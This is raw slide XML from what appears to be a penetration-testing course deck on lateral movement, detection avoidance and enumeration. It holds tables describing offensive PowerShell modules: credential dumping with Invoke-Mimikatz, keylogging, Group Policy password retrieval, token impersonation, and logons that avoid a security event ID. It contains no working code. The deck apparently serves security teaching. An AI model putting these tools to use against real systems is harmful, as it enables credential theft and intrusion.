                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Install-SSP</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Installs a security support provider (SSP) DLL</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3433902618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>SecurityPackages</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Enumerates all loaded security packages</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3909239564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Find-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVSignature</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Locates single-byte AV signatures, using the same method as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>DSplit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> from "class101"</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1147115551"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>TokenManipulation</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Lists available logon tokens, creates processes with other users' logon tokens, and impersonates logon tokens in the current thread</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1734481702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-Credential Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Creates logons with plaintext credentials without triggering a suspicious event ID 4648 (Explicit Credential Logon)</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="842462280"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>NinjaCopy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4121892049"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39896036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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925183"/>
            <a:ext cx="8786001" cy="2280608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD3392BF-586B-1BAC-FBDC-29EF951C7768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3327004878"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="75481" y="787160"/>
          <a:ext cx="8971626" cy="4242158"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2571750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1414830880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6399876">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1314350341"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Module/Script</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3138939995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mimikatz</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Reflectively loads </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mimikatz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> 2.0 in memory using PowerShell and can be used to dump credentials without writing anything to disk as well as for any functionality provided with </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mimikatz</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3889016744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-Keystrokes</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Logs keys pressed, time, and the active window</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3868594995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>GPPPassword</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3816093248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="544285">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>GPPAutologon</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Retrieves the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>autologon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> username and password from registry.xml if pushed through Group Policy Preferences</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3433902618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Timedscreenshot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Takes screenshots at regular intervals and saves them to a folder</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3909239564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>New-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>VolumeShadowCopy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
